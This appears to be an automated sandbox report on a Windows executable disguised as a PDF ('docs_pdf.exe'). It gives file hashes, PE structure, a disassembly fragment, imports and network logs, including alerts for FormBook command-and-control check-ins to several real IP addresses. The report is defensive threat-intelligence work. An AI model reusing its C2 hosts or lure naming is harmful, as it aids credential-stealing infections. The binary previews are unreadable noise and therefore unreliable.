Preview:.....A9KW..Y...k.K@...a4I..ERFPGMX2WUKCJBBI7A9KWERFPGMX2W.KCJL].9A.B.d.G..l.Z>&k38-%;V,.(6+<)$g/=.% %c#,b.x..&8!7h]JG|2WUKCJB;H>..+0.o&7.p8U.O..x"..[..y2!.]...k5,..+!!.!^.WERFPGMXb.UK.KCBXnyYKWERFPGM.2UT@BABBY3A9KWERFPGmM2WU[CJBbM7A9.WEBFPGOX2QUKCJBBI1A9KWERFPgIX2UUKCJBBK7..KWURF@GMX2GUKSJBBI7A)KWERFPGMX2WUKCJBBI7A9KWERFPGMX2WUKCJBBI7A9KWERFPGMX2WUKCJBBI7A9KWERFPGMX2WUKCJBBI7A9KWERFPGMX2WUKCJBBI7A9KWERFPGMX2WUKCJBBI7A9KWERF~
                                  Process:C:\Users\user\Desktop\docs_pdf.exe
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):9856
                                  Entropy (8bit):7.5981303542491725
                                  Encrypted:false
                                  SSDEEP:192:ZyaFcKdCicbZ/vL8eXcmP7m/LW+sxsddxDIjW678yfsRpO/2ZnEBVw8:3F7AicbZ/vLXXZKTNsGDIK6VfsnOuZED
                                  MD5:DFFC837B10948578C409D85C20AF7A1A
                                  SHA1:435D3D5E605EC638259DD0A6AF66904FB4364569
                                  SHA-256:DD5B71209E361E5C8CB0939ECB0F415E973953EF277C26881B4FF718D532B2F6
                                  SHA-512:A58929E3195A8C0991C3071AB990386AEEC0715B3B8CCC6AFF1C0F7951923B9364589FD40DCC33A1E19AC1F5C08A53DF740297F55E17DF61AF647EBA01D037EA
                                  Malicious:false
                                  Reputation:low
                                  Preview:EA06..pT..f.Y..4.Lf.9..D.P..I..3..h3j..s9..g3...g3..4:..E..&.i..8......D.Ph3...aB.Q..j5.q4.Pf....qb.....-..c.L...$.m5...k..c0.M....k8.X.3i...l..%.o2....A8.6,.........3k....e.N&s0.oNf.)...k.K$.eb....5..f.........6.0.o.p....l39....V0...S..$.if...6....f.I...@.....i8........X@.4.1..........$.P...0z.5..$}3Y.....=5..`d....!d..V...7f.[$..8...|.I..W.d...|vI..W.d...|vK..W.d...|vK(.W.e...|vY..W,.O...k.`..X@..9..^.8..F.6.z..G......`......i..G../Z...zqd...l.;.........|......7...}3{(........;^..l =..p.........3p.o....,.......x.....H<.lX.:...b.....,. ...2...f.[...K.)....b..i|v F......X......`....,.9....5...._..l......>K.....ir.e....[4..d..f.y.....,.....S >..p...........s9.... !..Y....f...ja4....ea.h,.p.....,.a8.,..3........f.....f ....,j.0..&...J......f ....6K%.ke..f....L..;2.X...4.Y.V@.Fn.....f@....l..05.....!;3.X...c )D.g6... ...'&`....,f.6..&....r...Brh.....l...i2...B....@.......d.L.`!.....P...@X5d..lSK...9...!;5.X...cVY......'.B...,vl.!..>.a..l...M..@...X...b.M&
                                  Process:C:\Users\user\Desktop\docs_pdf.exe
                                  File Type:ASCII text, with very long lines (28756), with no line terminators
                                  Category:dropped
                                  Size (bytes):28756
                                  Entropy (8bit):3.5934503475136346
                                  Encrypted:false
                                  SSDEEP:768:4iTZ+2QoioGRk6ZklputwjpjBkCiw2RuJ3nXKUrvzjsNbA+IL26cz24vfF3if6g2:4iTZ+2QoioGRk6ZklputwjpjBkCiw2Rf
                                  MD5:AEA3A63E777AB70DEF65DEB0959F608A
                                  SHA1:1705D8F3043D187D3270C494D4DC6DC1813C7E59
                                  SHA-256:A6A484D92273CD78434641E78D248D2502DDFF5850355A1CF8777EE240AF381F
                                  SHA-512:9DF1E1A42B95CC6F2B27CC0E66ED74D1B8A8CE23A959F925454990CD7CD0DF2D04D7A75A66625CD1CFCDF195B67FC9CFFB28E575909DFA7C1A374587F7A2ED61
                                  Malicious:false
                                  Reputation:low
                                  Preview:
                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                  Entropy (8bit):7.145231431817893
                                  TrID:
                                  • Win32 Executable (generic) a (10002005/4) 99.96%
                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                  • DOS Executable Generic (2002/1) 0.02%
                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                  File name:docs_pdf.exe
                                  File size:1'190'400 bytes
                                  MD5:942c50b985dc1e6eb49c1763d39d398f
                                  SHA1:9de6943387aef034ae9d2eab93f4ef557aba7ad2
                                  SHA256:455f3956ac0f7082228d48ed98ff0ea1d6f2cef1c01f6dc263502696e6a9a5b7
                                  SHA512:d25730885f8b18491500832af72a66ca14be9f23c5d8039a4f26a3b6ff9353bfa7e4689675b5fdb0410781881f5a418e881f9888508e1458b32e3b03d2425dd2
                                  SSDEEP:24576:uAHnh+eWsN3skA4RV1Hom2KXMmHazbg6J7wZ48VXAEiK5:Zh+ZkldoPK8YazbgrZ48VwEL
                                  TLSH:C945AE0273D2D036FFAB92739B6AF60156BC79254133852F13981DB9BD701B2263E663
                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........s..R...R...R....C..P.....;.S..._@#.a..._@......_@..g...[j..[...[jo.w...R...r.............#.S..._@'.S...R.k.S.....".S...RichR..
                                  Icon Hash:aaf3e3e3938382a0
                                  Entrypoint:0x42800a
                                  Entrypoint Section:.text
                                  Digitally signed:false
                                  Imagebase:0x400000
                                  Subsystem:windows gui
                                  Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                  DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                  Time Stamp:0x668F150E [Wed Jul 10 23:11:10 2024 UTC]
                                  TLS Callbacks:
                                  CLR (.Net) Version:
                                  OS Version Major:5
                                  OS Version Minor:1
                                  File Version Major:5
                                  File Version Minor:1
                                  Subsystem Version Major:5
                                  Subsystem Version Minor:1
                                  Import Hash:afcdf79be1557326c854b6e20cb900a7
                                  Instruction
                                  call 00007F737D3426EDh
                                  jmp 00007F737D3354A4h
                                  int3
                                  int3
                                  int3
                                  int3
                                  int3
                                  int3
                                  int3
                                  int3
                                  int3
                                  int3
                                  int3
                                  int3
                                  push edi
                                  push esi
                                  mov esi, dword ptr [esp+10h]
                                  mov ecx, dword ptr [esp+14h]
                                  mov edi, dword ptr [esp+0Ch]
                                  mov eax, ecx
                                  mov edx, ecx
                                  add eax, esi
                                  cmp edi, esi
                                  jbe 00007F737D33562Ah
                                  cmp edi, eax
                                  jc 00007F737D33598Eh
                                  bt dword ptr [004C41FCh], 01h
                                  jnc 00007F737D335629h
                                  rep movsb
                                  jmp 00007F737D33593Ch
                                  cmp ecx, 00000080h
                                  jc 00007F737D3357F4h
                                  mov eax, edi
                                  xor eax, esi
                                  test eax, 0000000Fh
                                  jne 00007F737D335630h
                                  bt dword ptr [004BF324h], 01h
                                  jc 00007F737D335B00h
                                  bt dword ptr [004C41FCh], 00000000h
                                  jnc 00007F737D3357CDh
                                  test edi, 00000003h
                                  jne 00007F737D3357DEh
                                  test esi, 00000003h
                                  jne 00007F737D3357BDh
                                  bt edi, 02h
                                  jnc 00007F737D33562Fh
                                  mov eax, dword ptr [esi]
                                  sub ecx, 04h
                                  lea esi, dword ptr [esi+04h]
                                  mov dword ptr [edi], eax
                                  lea edi, dword ptr [edi+04h]
                                  bt edi, 03h
                                  jnc 00007F737D335633h
                                  movq xmm1, qword ptr [esi]
                                  sub ecx, 08h
                                  lea esi, dword ptr [esi+08h]
                                  movq qword ptr [edi], xmm1
                                  lea edi, dword ptr [edi+08h]
                                  test esi, 00000007h
                                  je 00007F737D335685h
                                  bt esi, 03h
                                  Programming Language:
                                  • [ASM] VS2013 build 21005
                                  • [ C ] VS2013 build 21005
                                  • [C++] VS2013 build 21005
                                  • [ C ] VS2008 SP1 build 30729
                                  • [IMP] VS2008 SP1 build 30729
                                  • [ASM] VS2013 UPD5 build 40629
                                  • [RES] VS2013 build 21005
                                  • [LNK] VS2013 UPD5 build 40629
                                  Name | Virtual Address | Virtual Size | Is in Section
                                  IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                                  IMAGE_DIRECTORY_ENTRY_IMPORT | 0xbc0cc | 0x17c | .rdata
                                  IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xc8000 | 0x5830c | .rsrc
                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                  IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                                  IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x121000 | 0x7134 | .reloc
                                  IMAGE_DIRECTORY_ENTRY_DEBUG | 0x92bc0 | 0x1c | .rdata
                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                  IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0xa4b50 | 0x40 | .rdata
                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                  IMAGE_DIRECTORY_ENTRY_IAT | 0x8f000 | 0x884 | .rdata
                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                                  IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                                  Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                  .text | 0x1000 | 0x8dfdd | 0x8e000 | 310e36668512d53489c005622bb1b4a9 | False | 0.5735602580325704 | data | 6.675248351711057 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                  .rdata | 0x8f000 | 0x2fd8e | 0x2fe00 | 748cf1ab2605ce1fd72d53d912abb68f | False | 0.32828818537859006 | data | 5.763244005758284 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                  .data | 0xbf000 | 0x8f74 | 0x5200 | aae9601d920f07080bdfadf43dfeff12 | False | 0.1017530487804878 | data | 1.1963819235530628 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                  .rsrc | 0xc8000 | 0x5830c | 0x58400 | c9b291c10ff6b4fef017670cc607ee11 | False | 0.9275047583215298 | data | 7.895439728782804 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                  .reloc | 0x121000 | 0x7134 | 0x7200 | f04128ad0f87f42830e4a6cdbc38c719 | False | 0.7617530153508771 | data | 6.783955557128661 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                  Name | RVA | Size | Type | Language | Country | ZLIB Complexity
                                  RT_ICON | 0xc84a0 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.3885135135135135
                                  RT_ICON | 0xc85c8 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 0 | English | Great Britain | 0.3333333333333333
                                  RT_ICON | 0xc88b0 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 0 | English | Great Britain | 0.5
                                  RT_ICON | 0xc89d8 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 0 | English | Great Britain | 0.2835820895522388
                                  RT_ICON | 0xc9880 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 0 | English | Great Britain | 0.37906137184115524
                                  RT_ICON | 0xca128 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 0 | English | Great Britain | 0.23699421965317918
                                  RT_ICON | 0xca690 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 0 | English | Great Britain | 0.13858921161825727
                                  RT_ICON | 0xccc38 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | English | Great Britain | 0.25070356472795496
                                  RT_ICON | 0xcdce0 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 0 | English | Great Britain | 0.3173758865248227
                                  RT_STRING | 0xce148 | 0x594 | data | English | Great Britain | 0.3333333333333333
                                  RT_STRING | 0xce6dc | 0x68a | data | English | Great Britain | 0.2747909199522103
                                  RT_STRING | 0xced68 | 0x490 | data | English | Great Britain | 0.3715753424657534
                                  RT_STRING | 0xcf1f8 | 0x5fc | data | English | Great Britain | 0.3087467362924282
                                  RT_STRING | 0xcf7f4 | 0x65c | data | English | Great Britain | 0.34336609336609336
                                  RT_STRING | 0xcfe50 | 0x466 | data | English | Great Britain | 0.3605683836589698
                                  RT_STRING | 0xd02b8 | 0x158 | Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0 | English | Great Britain | 0.502906976744186
                                  RT_RCDATA | 0xd0410 | 0x4f9a4 | data | | | 1.0003251015175494
                                  RT_GROUP_ICON | 0x11fdb4 | 0x76 | data | English | Great Britain | 0.6610169491525424
                                  RT_GROUP_ICON | 0x11fe2c | 0x14 | data | English | Great Britain | 1.15
                                  RT_VERSION | 0x11fe40 | 0xdc | data | English | Great Britain | 0.6181818181818182
                                  RT_MANIFEST | 0x11ff1c | 0x3ef | ASCII text, with CRLF line terminators | English | Great Britain | 0.5074478649453823
                                  DLL | Import
                                  WSOCK32.dll | WSACleanup, socket, inet_ntoa, setsockopt, ntohs, recvfrom, ioctlsocket, htons, WSAStartup, __WSAFDIsSet, select, accept, listen, bind, closesocket, WSAGetLastError, recv, sendto, send, inet_addr, gethostbyname, gethostname, connect
                                  VERSION.dll | GetFileVersionInfoW, GetFileVersionInfoSizeW, VerQueryValueW
                                  WINMM.dll | timeGetTime, waveOutSetVolume, mciSendStringW
                                  COMCTL32.dll | ImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
                                  MPR.dll | WNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
                                  WININET.dll | InternetQueryDataAvailable, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetConnectW
                                  PSAPI.DLL | GetProcessMemoryInfo
                                  IPHLPAPI.DLL | IcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
                                  USERENV.dll | DestroyEnvironmentBlock, UnloadUserProfile, CreateEnvironmentBlock, LoadUserProfileW
                                  UxTheme.dll | IsThemeActive
                                  KERNEL32.dll | DuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, SetCurrentDirectoryW, GetLongPathNameW, GetShortPathNameW, DeleteFileW, FindNextFileW, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, GetCurrentProcess, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, LoadLibraryW, VirtualAlloc, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, GetCurrentThread, CloseHandle, GetFullPathNameW, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, WriteConsoleW, FindClose, SetEnvironmentVariableA
                                  USER32.dll | AdjustWindowRectEx, CopyImage, SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, SetRect, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, MonitorFromRect, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, PeekMessageW, UnregisterHotKey, CheckMenuRadioItem, CharLowerBuffW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, LoadImageW, GetClassNameW
                                  GDI32.dll | StrokePath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, GetDeviceCaps, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, LineTo, AngleArc, MoveToEx, Ellipse, DeleteDC, GetPixel, CreateDCW, GetStockObject, GetTextFaceW, CreateFontW, SetTextColor, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, StrokeAndFillPath
                                  COMDLG32.dll | GetOpenFileNameW, GetSaveFileNameW
                                  ADVAPI32.dll | GetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, RegCreateKeyExW, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, AddAce, SetSecurityDescriptorDacl, GetUserNameW, InitiateSystemShutdownExW
                                  SHELL32.dll | DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
                                  ole32.dll | CoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoSetProxyBlanket, CoCreateInstanceEx, CoInitializeSecurity
                                  OLEAUT32.dll | LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, RegisterTypeLib, CreateStdDispatch, DispCallFunc, VariantChangeType, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, VariantCopy, VariantClear, OleLoadPicture, QueryPathOfRegTypeLib, RegisterTypeLibForUser, UnRegisterTypeLibForUser, UnRegisterTypeLib, CreateDispTypeInfo, SysAllocString, VariantInit
                                  Language of compilation system | Country where language is spoken | Map
                                  English | Great Britain |
                                  Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
                                  07/13/24-00:07:48.656337 | TCP | 2855464 | ETPRO TROJAN FormBook CnC Checkin (POST) M3 | 49738 | 80 | 192.168.2.4 | 217.160.0.106
                                  07/13/24-00:08:53.091829 | TCP | 2855464 | ETPRO TROJAN FormBook CnC Checkin (POST) M3 | 49750 | 80 | 192.168.2.4 | 194.9.94.85
                                  07/13/24-00:08:18.355432 | TCP | 2855464 | ETPRO TROJAN FormBook CnC Checkin (POST) M3 | 49743 | 80 | 192.168.2.4 | 208.91.197.27
                                  07/13/24-00:08:39.497873 | TCP | 2855464 | ETPRO TROJAN FormBook CnC Checkin (POST) M3 | 49746 | 80 | 192.168.2.4 | 43.252.167.188
                                  07/13/24-00:09:06.939506 | TCP | 2855464 | ETPRO TROJAN FormBook CnC Checkin (POST) M3 | 49754 | 80 | 192.168.2.4 | 23.251.54.212
                                  07/13/24-00:07:46.120127 | TCP | 2855464 | ETPRO TROJAN FormBook CnC Checkin (POST) M3 | 49737 | 80 | 192.168.2.4 | 217.160.0.106
                                  07/13/24-00:08:55.622362 | TCP | 2855464 | ETPRO TROJAN FormBook CnC Checkin (POST) M3 | 49751 | 80 | 192.168.2.4 | 194.9.94.85
                                  07/13/24-00:08:15.823053 | TCP | 2855464 | ETPRO TROJAN FormBook CnC Checkin (POST) M3 | 49742 | 80 | 192.168.2.4 | 208.91.197.27
                                  07/13/24-00:09:09.468816 | TCP | 2855464 | ETPRO TROJAN FormBook CnC Checkin (POST) M3 | 49755 | 80 | 192.168.2.4 | 23.251.54.212
                                  07/13/24-00:08:42.029982 | TCP | 2855464 | ETPRO TROJAN FormBook CnC Checkin (POST) M3 | 49747 | 80 | 192.168.2.4 | 43.252.167.188
                                  Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                  Jul 13, 2024 00:07:30.359757900 CEST | 49736 | 80 | 192.168.2.4 | 5.44.111.162
                                  Jul 13, 2024 00:07:30.367351055 CEST | 80 | 49736 | 5.44.111.162 | 192.168.2.4
                                  Jul 13, 2024 00:07:30.367444992 CEST | 49736 | 80 | 192.168.2.4 | 5.44.111.162
                                  Jul 13, 2024 00:07:30.369421959 CEST | 49736 | 80 | 192.168.2.4 | 5.44.111.162
                                  Jul 13, 2024 00:07:30.377805948 CEST | 80 | 49736 | 5.44.111.162 | 192.168.2.4
                                  Jul 13, 2024 00:07:31.044356108 CEST | 80 | 49736 | 5.44.111.162 | 192.168.2.4
                                  Jul 13, 2024 00:07:31.044428110 CEST | 80 | 49736 | 5.44.111.162 | 192.168.2.4
                                  Jul 13, 2024 00:07:31.044595957 CEST | 49736 | 80 | 192.168.2.4 | 5.44.111.162
                                  Jul 13, 2024 00:07:31.047086954 CEST | 49736 | 80 | 192.168.2.4 | 5.44.111.162
                                  Jul 13, 2024 00:07:31.054765940 CEST | 80 | 49736 | 5.44.111.162 | 192.168.2.4
                                  Jul 13, 2024 00:07:46.111649036 CEST | 49737 | 80 | 192.168.2.4 | 217.160.0.106
                                  Jul 13, 2024 00:07:46.118453979 CEST | 80 | 49737 | 217.160.0.106 | 192.168.2.4
                                  Jul 13, 2024 00:07:46.118557930 CEST | 49737 | 80 | 192.168.2.4 | 217.160.0.106
                                  Jul 13, 2024 00:07:46.120126963 CEST | 49737 | 80 | 192.168.2.4 | 217.160.0.106
                                  Jul 13, 2024 00:07:46.127224922 CEST | 80 | 49737 | 217.160.0.106 | 192.168.2.4
                                  Jul 13, 2024 00:07:46.762787104 CEST | 80 | 49737 | 217.160.0.106 | 192.168.2.4
                                  Jul 13, 2024 00:07:46.762901068 CEST | 80 | 49737 | 217.160.0.106 | 192.168.2.4
                                  Jul 13, 2024 00:07:46.762978077 CEST | 49737 | 80 | 192.168.2.4 | 217.160.0.106
                                  Jul 13, 2024 00:07:47.627954006 CEST | 49737 | 80 | 192.168.2.4 | 217.160.0.106
                                  Jul 13, 2024 00:07:48.645911932 CEST | 49738 | 80 | 192.168.2.4 | 217.160.0.106
                                  Jul 13, 2024 00:07:48.651062965 CEST | 80 | 49738 | 217.160.0.106 | 192.168.2.4
                                  Jul 13, 2024 00:07:48.651182890 CEST | 49738 | 80 | 192.168.2.4 | 217.160.0.106
                                  Jul 13, 2024 00:07:48.656337023 CEST | 49738 | 80 | 192.168.2.4 | 217.160.0.106
                                  Jul 13, 2024 00:07:48.661279917 CEST | 80 | 49738 | 217.160.0.106 | 192.168.2.4
                                  Jul 13, 2024 00:07:49.323837996 CEST | 80 | 49738 | 217.160.0.106 | 192.168.2.4
                                  Jul 13, 2024 00:07:49.323935032 CEST | 80 | 49738 | 217.160.0.106 | 192.168.2.4
                                  Jul 13, 2024 00:07:49.323990107 CEST | 49738 | 80 | 192.168.2.4 | 217.160.0.106
                                  Jul 13, 2024 00:07:50.159162045 CEST | 49738 | 80 | 192.168.2.4 | 217.160.0.106
                                  Jul 13, 2024 00:07:51.177151918 CEST | 49739 | 80 | 192.168.2.4 | 217.160.0.106
                                  Jul 13, 2024 00:07:51.183880091 CEST | 80 | 49739 | 217.160.0.106 | 192.168.2.4
                                  Jul 13, 2024 00:07:51.183975935 CEST | 49739 | 80 | 192.168.2.4 | 217.160.0.106
                                  Jul 13, 2024 00:07:51.185796022 CEST | 49739 | 80 | 192.168.2.4 | 217.160.0.106
                                  Jul 13, 2024 00:07:51.191941977 CEST | 80 | 49739 | 217.160.0.106 | 192.168.2.4
                                  Jul 13, 2024 00:07:51.192007065 CEST | 80 | 49739 | 217.160.0.106 | 192.168.2.4
                                  Jul 13, 2024 00:07:51.192020893 CEST | 80 | 49739 | 217.160.0.106 | 192.168.2.4
                                  Jul 13, 2024 00:07:51.192049026 CEST | 80 | 49739 | 217.160.0.106 | 192.168.2.4
                                  Jul 13, 2024 00:07:51.192063093 CEST | 80 | 49739 | 217.160.0.106 | 192.168.2.4
                                  Jul 13, 2024 00:07:51.194511890 CEST | 80 | 49739 | 217.160.0.106 | 192.168.2.4
                                  Jul 13, 2024 00:07:51.194577932 CEST | 80 | 49739 | 217.160.0.106 | 192.168.2.4
                                  Jul 13, 2024 00:07:51.194592953 CEST | 80 | 49739 | 217.160.0.106 | 192.168.2.4
